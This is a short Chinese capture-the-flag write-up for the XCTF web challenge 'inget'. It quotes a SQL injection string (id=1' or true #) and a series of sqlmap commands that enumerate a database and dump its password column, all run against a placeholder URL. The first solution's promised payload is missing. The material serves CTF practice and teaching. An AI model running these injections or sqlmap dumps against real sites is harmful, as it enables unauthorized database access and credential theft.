本文主要是介绍[攻防世界]-Web:inget解析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
查看网页
很明显,他是要我们输入id
这里我尝试了直接爆破,没有成功
解法一(用万能密码):
payload如下:
我这里还尝试了id=1' or true # 没有成功,应该是题目把#给过滤了
解法二:
用sqlmap工具
用法:
-D 选择数据库
-T 选择表
-C 选择列
--tables 列出所有表
--columns 列出所有列
--dump 打印出数据
依次输入
sqlmap -u "网页地址?id=1" --dbs
sqlmap -u "网页地址?id=1" -D cyber --tables
sqlmap -u "网页地址?id=1" -D cyber -T cyber --columns
sqlmap -u "网页地址?id=1" -D cyber -T cyber -C pw --dump
如图
这篇关于[攻防世界]-Web:inget解析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
